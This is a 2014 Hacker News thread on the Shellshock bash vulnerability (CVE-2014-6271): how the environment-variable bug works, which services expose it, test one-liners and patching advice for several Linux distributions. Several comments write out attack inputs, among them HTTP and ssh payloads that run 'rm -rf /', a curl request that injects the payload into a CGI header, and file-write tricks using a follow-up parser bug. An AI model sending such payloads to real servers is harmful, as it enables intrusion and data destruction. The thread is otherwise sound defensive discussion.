CVE-2014-6271: Remote code execution through bash (seclists.org)
905 points by vault_ on Sept 24, 2014 | 416 comments

There's some misunderstanding of how the one-liner works, so here's a writeup.

You can break the one-liner into two lines to see what is happening.

    1. hobbes@media:~$ export badvar='() { :;}; echo vulnerable'
    2. hobbes@media:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
    3. bash: warning: badvar: ignoring function definition attempt
    4. bash: error importing function definition for `badvar'
    5. I am an innocent sub process in 4.3.25(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash spots the specially formed variable (named badvar), prints a warning,

4. ...and apparently doesn't define the function at all?

5. But other than that, the child bash runs as expected.

And now the same two input lines on an OLD bash:

    1. hobbes@metal:~$ export badvar='() { :;}; echo vulnerable'
    2. hobbes@metal:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
    3. vulnerable
    4. I am an innocent sub process in 4.3.22(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash accidentally EXECUTES a snippet that was inside the variable named 'badvar'?!

4. But other than that, the child bash runs as expected. Wow, I should update that machine. :)

I finally understand how it can be used.

I'm sorry; perhaps I'm slow. I see the problem, but how can a stranger set an environment variable?

Lots of internet facing software fills env vars with user data: Apache may set several SSL_* vars and HTTP_* vars, ssh may set LC_*, LANG, TERM, etc; procmail and other smtp filters probably have their fair share too.

The moment any child process of these hits a system()- or popen()-like call, /bin/sh initializes and may hit the bug.
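The chain can be sketched in one harmless line (the variable name HTTP_USER_AGENT is just a stand-in for whatever the server exports from user input):

```shell
# simulate a server exporting attacker-controlled data, then shelling out
export HTTP_USER_AGENT='() { :;}; echo pwned'
bash -c 'echo handling request'
```

On an unpatched bash the child prints "pwned" before "handling request"; a patched bash prints only the latter.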

So it's a sort of injection attack that targets inputs to bash that manage to bypass normal sanitisation?

Apache takes SSL_* headers, say, from a client and simply passes those to BASH, and this exploit means that BASH will execute a payload dropped into the header? Am I close? Wouldn't that also be an Apache [httpd] bug, in that it's allowing unsanitised user data to hit the shell?

Similarly are you saying that if I set a LANG variable and SSH to a server that the server will use that variable to give to BASH, even if it's not a recognised LANG variable?

Perhaps I'm misunderstanding as such things would be massive holes any way regardless of this BASH issue.

From the example code at the top of the thread it seems that you only need to affect a single variable, that bash reads, in order to pwn the whole server.

Interestingly on Ubuntu the BASH update for this is rated "medium".

It's kind of the equivalent of a web app that basically evals any given GET parameter with a specially crafted value.

Apache sets environment variables, it does not pass user input directly to bash as code or anything like that. The fact that bash can be tricked to execute this code is a problem that needs to be addressed by bash, not any other software.

>"Apache sets environment variables, it does not pass user input directly to bash as code or anything like that." //

This is contrary to how I'm understanding the situation. BASH, or whichever shell is being used, sets environment variables; Apache httpd et al. pass off some user data (from clients, eg browser headers) to the shell to set variables under limited circumstances [like use of CGI], no? Then when BASH gets initialised something is happening in the parsing of variables causing statements included with the variable (which variable can be a function definition) to be executed.

I realise now that as things stand you can't sanitise many of the fields [like http client headers] as they don't have well defined forms. But setting variables for use by BASH seems as close to "pass user input directly to bash" as you're going to get.

Mainly I'm doubting that all these different apps duplicate code to set env variables when the shell already knows how to do it, doesn't seem very *nixy. Happy to be corrected as I'm - as I'm sure you've guessed - a bit out of my depth.

Sorry for the late reply - you can think of environment variables as basically HTTP headers for bash scripts. They are one way to pass user input to a bash script. While you want bash to make those environment variables available to the bash script, you don't really want any code in their value to be executed (unless, of course, your script does that on purpose).

httpd with CGI does not alter your bash script by prepending a set of variable assignments (which, of course, would be a very bad idea) - it simply sets values that are then passed to bash. The bash parser then can be tricked into executing code in those environment variables.

In a webserver, like Apache, environment variables are set from headers sent by the client, e.g. a header like Cookie would produce a variable like HTTP_COOKIE. These variables can contain any data that the user sent. If Apache uses external code (like PHP, Ruby, Python, etc.) to process the request, it may pass these variables to that code, and if that code runs some command on the system, these variables may be passed to the command shell, which would lead to code contained in the variable being executed at that point.

This can also happen with other service processes - such as OpenSSH, which sets the SSH_ORIGINAL_COMMAND variable to the command that the user supplies. That may allow people to break out of restricted accounts - i.e. accounts that are supposed to run just one command (ssh-based services, like SVN or Git, may be an example) - and run arbitrary commands under such a user.

>OpenSSH, which sets the SSH_ORIGINAL_COMMAND variable to the command that the user supplies //

So they set shell vars without sanitising them first?

As an analogy, suppose I go to a website written in PHP and register with the username "Robert'); DROP TABLE Students;--". A correct PHP script will sanitize the name; it'll escape the quote and run something like `update users set name='Robert\'); DROP TABLE Students;--'`. If mysql then ignores the backslash and drops the Students table, that is definitely a mysql problem and not a PHP problem. Doing any more on the PHP side to "sanitize" the name would actually break the script by screwing up valid names.

In this case, the shell variables are correctly sanitized by Apache or whatever, and then mishandled by bash. For example, imagine this very simple system:

- Web server receives a GET request with the user's name.

- Web server sets the environment variable USERS_NAME='<whatever was submitted with quotes escaped>'.

- Web server sends back the result of running `bash print_welcome_message.sh`.

It might not be considered great design, but there's nothing inherently insecure in this system, and there are plenty of actual systems that more or less work this way. And it's also perfectly valid for a user to have the name `() { :;}; echo vulnerable`. It ought to work fine to set USERS_NAME to that value and send back `Welcome, () { :;}; echo vulnerable.`

Instead, an unpatched bash will execute the contents of USERS_NAME. The only way for the web server to prevent that would be to change the user's name, which would be wrong behavior -- given a properly working shell, it would print the wrong name in the response. The web server does its sanitization job correctly when it successfully sets USERS_NAME in spite of any single quotes or what-have-you -- this part isn't its problem.
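The toy system above can be simulated in two lines (print_welcome_message.sh and USERS_NAME are the hypothetical names from the example):

```shell
# the web server has already exported USERS_NAME verbatim from the request
export USERS_NAME='() { :;}; echo vulnerable'
# stand-in for `bash print_welcome_message.sh`
bash -c 'echo "Welcome, $USERS_NAME."'
```

A patched bash prints the name literally, as the designer intended; an unpatched one executes the payload first.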

Ahh, Little Bobby Tables.



CGI scripts are the most obvious way - when executing a CGI script, each HTTP header gets translated into an environment variable - but I have no doubt there's all sorts of odd network-facing apps which set environment variables and then run a command, even if you're not running CGI scripts.

Surely though the CGI framework sanitises the headers first? Otherwise this seems like a pretty predictable problem - isn't "always sanitise user data" the cardinal rule of backends?

I can certainly imagine that I might have designed a web page that passed user input direct to a BASH script to do a ping or some such, but not if it's public facing.

What sanitization do you expect the CGI framework to apply to the header value representing the user agent? str_replace('() {', 'no bash bug for you', $userAgent)?

Only a few environment variables are given any meaning by the system. Other environment variables don't have any predefined meaning and can be any null-terminated string.

Indeed, lol. It's a bit clearer to me now. Thanks for your comment.

It seems like a sort of loose typing issue. Perhaps if when setting environment variables the app using them could specify a type (eg nonExecutableText) such that bash knows it's receiving textual content that mustn't be executed; would that help?

One of the comments in this thread (http://seclists.org/oss-sec/2014/q3/650 ), seems to indicate that Apache is an attack vector for this vulnerability.

Here is a simple C program to demonstrate this:

    #include <stdlib.h>

    int main()
    {
        setenv("VAR", "() { :;}; echo vulnerable", 0);
        system("echo innocent command");
        return 0;
    }

That's awesome.

Does system() invoke /bin/sh? Does it look for 'sh' on the path? What are the rules?
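For reference, POSIX specifies that system() and popen() behave as if they ran execl("/bin/sh", "sh", "-c", command, (char *)0) - a fixed path, not a $PATH lookup - so the exposure depends on what /bin/sh actually is on the box:

```shell
# /bin/sh is often a symlink; on Debian/Ubuntu it is usually dash,
# on Red Hat derivatives it is typically bash
ls -l /bin/sh
readlink -f /bin/sh
```

If /bin/sh resolves to an unpatched bash, every system()/popen() call in every service is a potential trigger.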

There are a lot of scripts that do something like: curl 'http://myradframework.com/script.sh' | bash

It'd be pretty easy to exploit this if they weren't honest, or to man-in-the-middle the site.

That's not really the risk with this vulnerability. Piping a web-sourced script to bash has always been a vulnerability, but it's one that you choose to live with when you do it.

The reason this is newsworthy is because there are some network-facing programs (CGI-based web servers, some SSH configurations) that will set the value of some environment variables to a user-supplied value, which will then be executed by bash when that program spawns a new shell.

That will run arbitrary code regardless

If you are responsible for the security of any system, this is your immediate, drop-everything priority. The technical details of the exploit mean that new ways of exploiting it will be discovered soon. Precedent suggests that automated systematic attacks against every server on the Internet will be coming, on a time scale of hours.

So, as an amateur sysadmin of a decently popular side project, what should I do? I've read over the post on the mailing list, and I think I understand the basic attack, but I'm having trouble understanding exactly how an attacker could run bash on my server and what I therefore need to patch (though I suspect that's intentional). Is `sudo apt-get update && sudo apt-get upgrade` sufficient on an Ubuntu server?

If you just want to upgrade bash, and prevent services like nginx, fpm, and apache from being restarted in production, you can run `sudo apt-get update && sudo apt-get install --only-upgrade bash`

Related to that, does anyone else know if upgrading bash will require a restart of other services kind of like upgrading openssl requires restarting things?

It turns out that these suggestions were premature; the patch released earlier today DOES NOT fix the problem. https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c24

I just tested this on Ubuntu 14.04 - it's vulnerable.

Upgrades should not require any restarts, and no restarts are required for you to stop being vulnerable - as this only affects newly created bash sessions, not already running ones.

Debian's package manager has the nasty habit of stopping affected daemons before all the upgrades and starting them afterwards, leaving you with serious downtime.

> Related to that, does anyone else know if upgrading bash will require a restart of other services kind of like upgrading openssl requires restarting things?

I don't think it will, for a couple of reasons. OpenSSL is integrated into other services as a library, while bash would be called as an external application. I also noticed that once I upgraded bash, the proof of concept stopped working in a terminal I opened prior to the upgrade.

> I also noticed that once I upgraded bash, the proof of concept stopped working in a terminal I opened prior to the upgrade.

[citation needed] because that doesn't sound possible.

Not if the issued commands spawned a new copy of Bash.

> Is `sudo apt-get update && sudo apt-get upgrade` sufficient on an Ubuntu server?

Yes. Patch is out.

It appears that Linode changes /etc/apt/sources.list to point to their own mirror of Ubuntu repositories, and as far as I can tell those are not updated yet. So I guess the solution is to wait or edit sources.list. Just FYI if you're on their systems!

Just did an update on my Linode and one of the updates was

    replace bash 4.1-2ubuntu3
So seems like it's there now.

https://launchpad.net/ubuntu/+source/bash/4.3-7ubuntu1.1 seems to be at least one version of the fix, I'm unsure about LTS and other releases.


Ubuntu 14.04 LTS: bash 4.3-7ubuntu1.1

Ubuntu 12.04 LTS: bash 4.2-2ubuntu2.2

Ubuntu 10.04 LTS: bash 4.1-2ubuntu3.1

For releases in-between, you should be able to manually download one of those versions from http://archive.ubuntu.com/ubuntu/pool/main/b/bash/ and install it. I wonder how many vulnerable boxes there are that won't get these updates because Ubuntu stops support after 9 months. There must be tons of boxes running 13.10, it's not even a year old yet.

It's for that reason that I just ignore anything that's not an LTS release. It's never worth the hassle for me.

For 13.10 do this, selecting the correct architecture.

For amd64:

    wget archive.ubuntu.com/ubuntu/pool/main/b/bash/bash_4.2-2ubuntu2.3_amd64.deb
    sudo dpkg -i bash_4.2-2ubuntu2.3_amd64.deb

For i386:

    wget archive.ubuntu.com/ubuntu/pool/main/b/bash/bash_4.2-2ubuntu2.3_i386.deb
    sudo dpkg -i bash_4.2-2ubuntu2.3_i386.deb

Depends on whether you have mirrors.linode.com or the ubuntu servers set up in sources.list. I had to swap mine out.

Well, I didn't even know about mirrors.linode.com. Mine were still the ubuntu default servers.

I guess apt-get from one of Linode's mirrors saves bandwidth? Or is it just more polite?

It probably ensures that you get the Linode-customized flavors of packages where such exist, so that, for example, you don't inadvertently upgrade your kernel to a build without the ability to mount Linode disks.

Linode can't modify packages; they're signed by the upstream distro. (Unless Linode added a key of their own to your apt keychain (apt-key list), but I've never seen that.)

It's also meant to help you and Linode save bandwidth!

Or just manually install the new version with dpkg.

If you just want to update that package then:

apt-get update

apt-get install --only-upgrade bash

fwiw, Linode's mirrors are up with the latest version yet Digital Ocean's are not. I lose faith in DO every time I remote into my VM. They just seem like an amateurish shop.

My droplets in SFO have been updated. My droplets in nyc1 and nyc2 haven't.

And NY is updated for me as well now. Wondering why it took so long after the other DCs were updated.

Checking in 8 hours later - my droplet on nyc1 is still affected.

I successfully upgraded bash on my droplets a couple minutes ago.

Seconded. I've been patched for ~40 minutes on DO.

I am on linode and precise LTS. I did this, and I got no bash update. What am I doing wrong?

edit: and how do I know if I am still vulnerable?

edit2: ok, this is the test

  env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
and apparently I am already patched. So that's good.

dpkg -l | grep bash

Will tell you which version of bash is installed; for precise you should have bash 4.2-2ubuntu2.2

DigitalOcean uses mirrors too, so you have to change your /etc/apt/sources.list file or wait.

I updated debian on DO like 25 minutes ago and had a crystal-clear bash update there. So I guess they updated their mirrors.

Debian security updates are distributed from security.debian.org, which is separate from the normal Debian mirror network, and Debian discourages the mirroring of security.debian.org because security updates are time sensitive. Hopefully Digital Ocean is not mirroring security.debian.org.

You should also reboot to ensure no running instances of bash are vulnerable.

If I understood this bug correctly, it happens during bash's initialization. If I'm right, already running instances of bash are not vulnerable, and new instances will use the fixed executable, so no reboot would be necessary for this bug.

  $ apt-cache show debian-goodies 
    checkrestart    - Help to find and restart processes which are using old
                      versions of upgraded files (such as libraries)

The vulnerability is in bash startup; any already-running shells should be safe.

Good point.

I don't know if Ubuntu has pushed a patched version of bash, but bash is what you should update. Someone already posted a way to test whether your version is vulnerable.

You might also look into changing the default shell (but beware, scripts with bashisms in them...).

Ubuntu pushed the update around noon


Really? I haven't been able to find any notice of that, and on 14.04 LTS if I run `sudo apt-get install --only-upgrade bash` I'm still vulnerable.

Ah, looks like I needed to run `sudo apt-get update` first.

sudo apt-get update && sudo apt-get upgrade

yeah, it was updated in debian in the morning...

you should apply all security updates, reliably, periodically, regardless of HN posts.

you're probably not directly vulnerable to this very vuln, but then again, maybe you are. With enough vulns it gets complex enough to check that it's easier to just apply all the security updates.

We just updated our scanner and included this CVE. You can run Detectify to see if your setup is vulnerable. We offer a recurring service that runs continuously and alerts you if you are exposed to new emerging vulnerabilities. This removes some of the complexity of always being on top of security alerts.

sup advertiser

If you're still waiting for mirrors and such to sync, you can install these packages manually on the LTS releases with the snippet here:


Looks like the patched version and the pre-patched version show the same version, or am I being stupid and missing something?

  ayourtch@mcmini:~/bash-patch$ ls
  bash_4.2-2ubuntu2.2_amd64.deb bash-builtins_4.2-2ubuntu2.2_amd64.deb  t
  ayourtch@mcmini:~/bash-patch$ dpkg -x bash_4.2-2ubuntu2.2_amd64.deb t
  ayourtch@mcmini:~/bash-patch$ diff -c t/bin/bash /bin/bash
  Binary files t/bin/bash and /bin/bash differ
  ayourtch@mcmini:~/bash-patch$ t/bin/bash --version
  GNU bash, version 4.2.25(1)-release (x86_64-pc-linux-gnu)
  Copyright (C) 2011 Free Software Foundation, Inc.
  License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

  This is free software; you are free to change and redistribute it.
  There is NO WARRANTY, to the extent permitted by law.
  ayourtch@mcmini:~/bash-patch$ /bin/bash --version
  GNU bash, version 4.2.25(1)-release (x86_64-pc-linux-gnu)
  Copyright (C) 2011 Free Software Foundation, Inc.
  License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
  This is free software; you are free to change and redistribute it.
  There is NO WARRANTY, to the extent permitted by law.
  ayourtch@mcmini:~/bash-patch$ sha1sum t/bin/bash
  9eeed02173db163b013933eff3b8c6aa3697f67f  t/bin/bash
  ayourtch@mcmini:~/bash-patch$ sha1sum /bin/bash
  3384fadf84146a4d4b6b7f529f615e9947b4ac99  /bin/bash

Only the build/patchset version is incremented in these packages (the -2ubuntu2.2). You can see the package version with dpkg -s bash | grep Version.

Anyone have code that might work on 13.04 please?

It will be once they release a patch, yes


Already out on Ubuntu, I believe?

A good question that so far nobody has answered (as of right now).

"If you are responsible for the security of any system, this is your immediate, drop-everything priority."

Why don't you explain in plain English exactly why you feel this is the case? "Drop-everything", in other words (or even close to that). Give some scenarios. After all, anyone who knows a great deal doesn't need that advice; the people who need that advice are the ones who don't know enough to know what the impact of this is. [1]

Perhaps you could clarify with some examples of why (see child comment "So, as a amateur sysadmin of a decently popular side project") you think this applies to anyone who is "responsible for the security of any system"?

[1] Me for one because I'm not seeing the "Drop everything" priority for any of the systems that I have control over given the way they are configured. That said I'd like to hear more of course.

Any library anywhere in any application you run that calls out to bash that is called by any other library in that application, so long as that application is somehow hooked up to a web server, is potentially an unauthenticated GET request away from code execution; the exploit for this is potentially so simple that attackers can craft a single request, spider the Internet, and collect shells from applications you run that you forgot you even ran, at which point they'll own your whole data center.


Very much so. I wasn't thinking through the library (and library equivalent) implications.

So for example if you don't run web servers that are front facing on the internet (and you trust your (for example) intranet) then does this become an "asap" rather than a "drop everything"?

"is potentially an unauthenticated GET request"

Are you saying that if you don't have a web server that allows "get" requests (only posts) then this exploit is not an issue at all?

The attack surface of this bug may very well be the largest attack surface of any bug in history. Update bash. Just update bash. Everywhere. On everything you have it on. Don't think about whether, just think about how.

(Note I'm not claiming this is the "worst bug ever"... there's stiff competition for that claim. But most of the rest of the "worst bug ever"s I can think of are some point that failed, some particular thing you could do for full root access or something. I can't think of anything else with this sheer staggering surface area.)

No, that is not what tptacek is saying.

Unauthenticated GET requests were just an example of something that can invoke this behavior. If you have any network-enabled service that's capable of spawning a shell, you can have attack vectors open.

Possible vectors include things like DHCP clients, SSH, web servers, etc. Lots of things open shells for reasons you wouldn't intuitively expect. It's very likely that there are many creative vectors for exploitation that will be discovered in the coming hours.

Read "unauthenticated GET request" as "people who can do the very very simplest thing to your webserver will find this."

I'm sure that the people at Home Depot knew for certain that their network was secure right up until the moment they discovered they were hacked.

You can learn by experience, or you can try to leach the wisdom of others.

I like the DHCP attack vector which was mentioned in the RedHat posting. DHCP clients invoke shell scripts.

Just curious, how long can a wireless SSID be?

I ask because I've seen SSIDs with meaningful characters ()<>;? cause trouble with some network managers. I presumed at the time that this was due to the SSID string being passed as an argument to some script.

I've encountered this on my old Android phone and my old Debian laptop. I encountered it often because a friend of mine used to have an emoticon in the SSID for his home router. (Really annoying! I couldn't connect to anything when his router was in range.)

Note: it could very well have been a different problem. I didn't investigate.

Are you saying that if you don't have a web server that allows "get" requests (only posts) then this exploit is not an issue at all?

Usually no. This exploit can be triggered via any HTTP method. Unauthenticated GETs are the lowest security bar of HTTP calls, so if they can be used as an attack vector, you should pay attention.

Because this allows execution of arbitrary commands from any unsanitized environment variable.

Web servers pass information about the HTTP client to CGI scripts using environment variables. A CGI script written in bash would be vulnerable to arbitrary command execution if any HTTP header contained the vulnerable string.

    GET / HTTP/1.0
    User-Agent: () { :; }; rm -rf /
Restricted SSH accounts (like the ones used by GitHub) have a setting to restrict the user to a specific command (e.g. /usr/local/bin/run-git-only --github-user=octocat). The original command is passed in an environment variable SSH_ORIGINAL_COMMAND. If bash is used anywhere along the way (say, if /usr/local/bin/run-git-only --github-user=octocat is a shell script), then this is a problem:

    ssh git@example.com '() { :; }; rm -rf /'
There are surely lots of other ways to get servers to run bash shells with arbitrary environment variables. That's why this is bad.

Edit: as others have pointed out, even non-bash CGI scripts that use a shell to run external processes are vulnerable. For example, system("/usr/local/bin/whatever --some-fixed-option") would normally be considered safe since there's no untrusted data in the command line (although perhaps it would be considered poor design), but it'll run a shell to do the whitespace splitting. If that shell is bash....

Is this also dangerous to common FastCGI-Wrappers? E.g. this is used by Virtualmin:

    export PHPRC
    umask 022
    exec /usr/bin/php5-cgi
At least SCRIPT_FILENAME is user input, isn't it? I'm really not sure but would like some clarity. It should not work, because it's likely impossible to have () at the beginning of SCRIPT_FILENAME, but can someone give some hints? It's common to have a bash/sh wrapper script: https://httpd.apache.org/mod_fcgid/mod/mod_fcgid.html#exampl...

IIUC, you're already pwned after the first line of your wrapper script, i.e. #!/bin/bash, as your CGI environment was already set before, and now you're running bash in it (unless FastCGI works differently, not by setting the environment as plain old CGI; I don't know FastCGI, but from a quick glance I think it works similarly)

FastCGI does work differently – it spawns a process which stays open and communicates with it over stdin / stdout – but that doesn't mean that his PHP script doesn't unexpectedly invoke system() somewhere.

This script here is run when the process is spawned, and it spawns the PHP process that listens on stdin/stdout. Similar scripts exist in most installs of mod_fcgid, e.g. PLESK, Virtualmin, other ISP panels... It boils down to looking at what environment variables are present when bash runs this script. Once bash starts and reads the environment variables, the exploit fires.

So considering there are other variables in there that can be manipulated, it would be possible to own a large chunk of servers on the Internet. However, I'm not sure if there is a caveat, and I had hoped that someone could help me.

Edit: Looks safe. These variables are not even there. It's just an outdated script.

I'm a relative newcomer to the command line and have been Googling around for what exactly the () {:;} is doing with no luck. Does anyone have a good link or explanation?

() makes a function; { opens the function body; : is an ancient 'command' that does nothing; ; says to run the : command; } closes the function body.
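The exploit string piggybacks on bash's function-export feature, which you can see in its legitimate form (safe to run on a patched bash):

```shell
# define a function and export it into the environment
f() { echo hello; }
export -f f
# a child bash imports f from its environment and can call it
bash -c f
```

The bug was that, when importing such a definition from the environment, old bash kept parsing past the closing brace and executed whatever followed.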

Got it, thanks!

Who the hell writes CGI scripts in 2014?

There is a reason PHP is to be kept away and not touched with a ten-meter stick; it seems to spawn a shell for weird reasons. I don't think Python or Groovy apps do that. They're safe, unless you somewhere specifically invoke System.getRuntime().run("bash");

PHP never "spawns shell for weird reasons" - it would spawn shell if you ask it to spawn shell. Just as any other language would, if you ask it. Still, many apps may use shell indirectly - e.g. to execute some system function, to call out to some tool, etc. - and those may be vulnerable even if original code was not CGI script. Moreover, you don't have to run specifically bash - any command execution may go through shell, which may be bash, e.g. Runtime.getRuntime().exec() in Java. Thus it may be not very easy to pinpoint all the places where this bug could sneak in.

> groovy apps do that [... if] you somewhere specifically invoke System.getRuntime().run("bash");

That's a one-liner in Groovy, written in the Java style of chained method calls, which is the direct equivalent of spawning a shell in non-JVM languages, so that's not an argument for using Groovy instead of PHP.

"A CGI script written in bash"

You're killin' me here. If you expose a shell script directly to the network, you're exposing a shell and deserve to be pwned.

If bash is invoked at any point in the response cycle you are pwned; not just if you are directly exposing a shell script. How confident are you that this never happens on any computers anywhere on your network ever?

That's ridiculous. You may as well say that every time you put a python script up, you're exposing the entire Python runtime and deserve to get 'pwned'.

The scope of the risk is limited to script that you write, whether bash or Python.

To be fair, with all the various ways how shell scripts (not only in bash) interpolate, evaluate, substitute etc., the typical shell language is much, much harder to keep safe against code injection than say Python (or even PHP). After all, code injection/evaluation is actually what you want in a shell script, half of the time.

It doesn't have a nice catchy name and a logo, though

Fine. Now it's called BashSmash. Are you happy? Go make a logo.

Someone already made on a few hours ago... https://i.imgur.com/ilJbM74.png

That's really ugly and not a real logo.

People are now calling it "Shellshock".

That's nice. I like this song.


That's funny, showing my age, but "Shellshock" immediately brings up a completely different song in my mind: https://www.youtube.com/watch?v=JUhZ30D7tYU

Is it just me, or are the patches "fixing" the vulnerability woefully insufficient? With the patch, bash stops executing the trailing code, but it still allows defining arbitrary shell functions from environment variables. So, even though the patch fixes the ability to exploit this via SSH_ORIGINAL_COMMAND or HTTP_*, anything that can set environment variables can still override an arbitrary command. (Note that privileged environments typically filter out attempts to set PATH, LD_LIBRARY_PATH, and so on.)

This applies even if your shell script or shell snippet uses the full paths to commands. For instance:

    $ env '/sbin/foo'='() { echo exploit; }' bash -c '/sbin/foo'

Attacker-controlled environment variable names are a rare scenario, and one that probably has you hosed no matter what. Attacker-controlled environment variable values, on the other hand, are not so rare, and if not for this vulnerability they wouldn't be a problem.

More specifically: The environment in general is an attack vector. I mean, it's global input that crosses execution domains! Any name/value pair could potentially mess with any number of programs in unexpected ways. A user should not be able to control any environment changes, period. Of course, whether or not this is practical is an exercise for the sysadmin.

It's not just you. The fact that an environment variable can override e.g. "git" to do something else is a real problem requiring separate protection. However, that's effectively PATH injection rather than code injection so it's already addressed in many cases.

Except that most environments already filter out attempts to control PATH, LD_LIBRARY_PATH, and similar; they don't filter out "git".

I agree. In the next few months, we'll probably be finding out about some of the cases where neither existing sanitization nor the half-fix for this problem was sufficient to prevent exploits in this family. :(

I might be misunderstanding this, but this can be accomplished through http request headers?

It would be a malformed http header and most libraries would ignore it or raise an error.

The vulnerability was released, what, a few hours ago? With a major vulnerability, waiting around for a "proper" fix is probably not a good idea. Get in a hot-patch to minimize the damage, then work on a "proper" fix...

It might still be an issue. The patches may not have done enough.

    $ env X='() { (a)=>\' sh -c "echo date"; cat echo

    env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :("

Can anyone confirm that this is still a security issue?

My reading of this is that it's weird, and it's certainly a bug in the parser, but because you don't get to put the executable code in the environment variable it's not an RCE exploit like the last bug was.

Does anyone have confirmation that this new bug allows you to RCE with control of the value of an environment variable alone?

As best I can tell no one has (publicly) demonstrated a mechanism to turn this into an RCE (despite efforts to do so).


Of course, that doesn't mean there isn't one. It's clearly a reasonably significant issue - the setting of environment variables can cause unintended file system writes (and the same parsing bug can be used for reads) - and you're better off assuming that someone will determine an exploit based on it.

That was my initial reaction too, but I'm not so sure now that the bash maintainer has responded. I'm trying to get a better PoC working.

edit: OK, I give. I don't understand how this is different from,

    env z='' echo oops
So, assuming you have Stupid Server 2.0, and SS 2.0 allows you to send an Accept: header with,

    '' evil command here
...you still need to find a way to execute that command, which is different from CVE-2014-6271, which caused function embedded in environment variables to be executed when they were read.

Am I missing something?

Am I missing something?

I think so, but the sample exploit isn't really designed to give a clear understanding if you don't already know what's going on.

Try this:

  $ export X="() { (a)=>\\"
  $ bash -c 'echo date'
  bash: X: line 1: syntax error near unexpected token `='
  bash: X: line 1: `'
  bash: error importing function definition for `X'
  $ cat echo
  Thu Sep 25 02:27:07 UTC 2014
Setting "X" in that way confuses the bash env variable parser. It barfs at the "=" and leaves the ">\" unparsed.

AFAICT (without digging deep into the code) that leaves ">\[NEWLINE]echo date" in the execution buffer, which gets treated the same as

  date > echo

Oh that's neat.

The same trick can be used to read files as well

  $ date -u > file1
  $ env -i X='() { (a)=<\' bash -c 'file1 cat'
  bash: X: line 1: syntax error near unexpected token `='
  bash: X: line 1: `'
  bash: error importing function definition for `X'
  Thu Sep 25 02:14:30 UTC 2014 
Though obviously it's going to be trickier to find a system that issues commands in a way that can act as a path for that sort of exploit.

Chet (bash maintainer) says he has a fix.


That's good news

Just tested on Ubuntu 14.04 patched.

"still vulnerable :("

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

From https://securityblog.redhat.com/2014/09/24/bash-specially-cr...

Oh damn:

curl -H 'User-Agent: () { :;}; echo; echo vulnerable to CVE-2014-6271' <shell script CGI URL>

Tested and working against a shell script CGI.
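For anyone wondering why a header reaches bash at all: a CGI-serving httpd copies request headers into HTTP_* environment variables before running the script. A rough simulation of the server side (values illustrative, payload harmless):

```shell
# The web server effectively does this before exec'ing a #!/bin/bash CGI:
# on an unpatched bash, the header value executes during environment
# import, before the script body even starts. On a patched bash, only the
# body runs.
HTTP_USER_AGENT='() { :;}; echo injected-before-body' \
  bash -c 'echo "CGI body ran"'
```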

Whoa. I tried this, ran pacaur -Suy and .. it's patched.

Arch was fast.

If you're on Arch, you might want to think about using dash as your /usr/bin/sh after updating, see [0].

[0] https://wiki.archlinux.org/index.php/Dash

Also make sure your mirror is up to date. When I updated this morning, osuosl was out of date (and still is as of this comment: https://www.archlinux.org/mirrors/osuosl.org/125/)

    $ x='() { :;}; echo vulnerable' bash -c 'echo test'
    $ pacman -Syu
    $ x='() { :;}; echo vulnerable' bash -c 'echo test'
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
Benefits of using an OS with a real package manager.

Just don't turn it off after you've run `pacman -Syu`, it will never boot again ;)

I know you're just teasing, but I've got a machine with an arch install from over two years ago that's still running great. Just did an -Syyu to get bash updated.

The trick is to keep up with the updates, do pacman -Syu every two weeks or so, and not wait months.

After it happened 5 times in a row, I finally just aliased pacman -Syu to "breakX".

I learned today that some mirrors update their package database a lot faster than others. Had to switch mirrors to get the new bash.


It's fixed in Debian as well.

only in wheezy (security) right now.

squeeze. jessie and wheezy are still vulnerable.


squeeze is not supported anymore but you can use squeeze-lts.

It's been uploaded to squeeze-lts but has not reached the mirrors.

You can get it manually from http://incoming.debian.org/debian-buildd/pool/main/b/bash/ if you can't wait.

I've got a Debian VM I maintain for giggles, and just out of masochism I've been running "apt-get update" and "apt-get upgrade" for a while and watching nothing change.. Am I doing something wrong or is the whole process just slow?

    deb http://http.debian.net/debian/ squeeze-lts main contrib non-free
    deb-src http://http.debian.net/debian/ squeeze-lts main contrib non-free

You probably have:

    APT::Default-Release "squeeze";
In a configuration somewhere. Check /etc/apt and the various files in the subdirectories of that.

If you have that line remove it or change it to squeeze-lts

I am not so sure. On Debian sid (i386) with current updates, the example test shows I am still vulnerable (bash 4.3-9).

I ran

    env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
and got

    this is a test
so I did

    apt-get update
    apt-get install bash
and now I get

    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test
bash version 4.2.37(1)-release

Edited: Seems like jvreeland has a clearer picture: https://news.ycombinator.com/item?id=8362309

Yeah, I was current yesterday and I'm current today, with both apt-get update and upgrades. Your version number is lower than mine, you must be on either stable or testing.

ii bash 4.3-9 i386 GNU Bourne Again SHell

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

vulnerable this is a test

From the FAQ:

> Does sid have security updates?

Not in the same sense that stable does. If the maintainer of a package fixes a security bug and uploads the package, it'll go into sid by the normal means. If the maintainer doesn't do that, then it won't. The security team only covers stable (and possibly testing... there's a pending issue for that case).

sid/unstable had a fix uploaded ~3 hrs ago fwiw (after you made your comment).

Only for amd64 though, ctrl+f for "4.3-9.1": http://ftp.debian.org/debian/pool/main/b/bash/

Yep. A current i386 debian is still vulnerable, some hours later. Curses.

Edit: I see that even those who got the patch are in fact still vulnerable.


Still vulnerable.

env X='() { (lol)=>\' bash -c "echo id"; cat echo

This is what happens when you have two different processes doing IPC using a human interface mechanism.

